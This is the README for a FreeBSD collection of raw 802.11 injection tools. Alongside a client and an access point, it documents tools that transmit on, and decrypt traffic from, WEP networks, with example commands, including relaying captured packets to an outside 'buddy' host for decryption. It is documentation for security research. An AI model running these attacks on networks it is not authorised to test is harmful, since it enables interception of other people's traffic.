xref: /freebsd/tools/tools/net80211/w00t/README (revision 4b9d6057)

This is a collection of tools that use raw 802.11 packet injection.
None of the tools configure the interface, so be sure to run something
like:

ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up

beforehand.  The following tools are found here:

assoc	A wifi client.
ap	A wifi access point.

prga	Gives ability to transmit on a WEP network.
redir	Gives ability to decrypt in real-time on a WEP network, via Internet.
expand	Gives ability to decrypt locally on a WEP network.

All these tools depend on:

libw00t	Utility functions used by all tools.

Detailed explanation of tools.
==============================

assoc:

Acts as a wifi client.  It will associate to a network and bind a
tap interface to it.  The interface may be used like a standard eth
interface attached to a normal LAN.  Multiple instances of the
program may be run in order to connect to multiple APs simultaneously.
Example:

./assoc -s w00t -t tap0
ifconfig tap0 192.168.0.123 up
ping 192.168.0.1

ap:

The same as assoc, but acts as an access point.  Example:

./ap -s w00t -t tap1
ifconfig tap1 192.168.0.1 up
tcpdump -n -i tap1

[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
for theoretical information.]

prga:

Sniff a packet on a WEP network and obtain a keystream.  It binds
to a tap interface which may be used to TX packets on that network.
Example:

./prga -b bssid_of_network -t tap0
ifconfig tap0 192.168.0.123 up
ping 192.168.0.1

redir:

Resend WEP packets to our buddy on the Internet.  The buddy will
receive the clear-text and send it back to us via a UDP socket.
This data is then fed back into a tap interface.  This way, data
may ultimately be read from the tap iface in clear-text.  Example:

[Box on Internet]~# ./buddy
./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
ifconfig tap0 up
tcpdump -n -i tap0

expand:

Sniff a WEP packet and do the linear keystream expansion trick to
decrypt it.  The clear-text packet is sent to a tap interface.
Example:

./expand -b bssid -t tap0
ifconfig tap0 up
tcpdump -n -i tap0
